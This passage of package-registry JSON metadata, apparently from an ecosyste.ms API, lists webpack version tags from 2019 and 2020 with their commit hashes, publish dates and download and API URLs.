1.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/re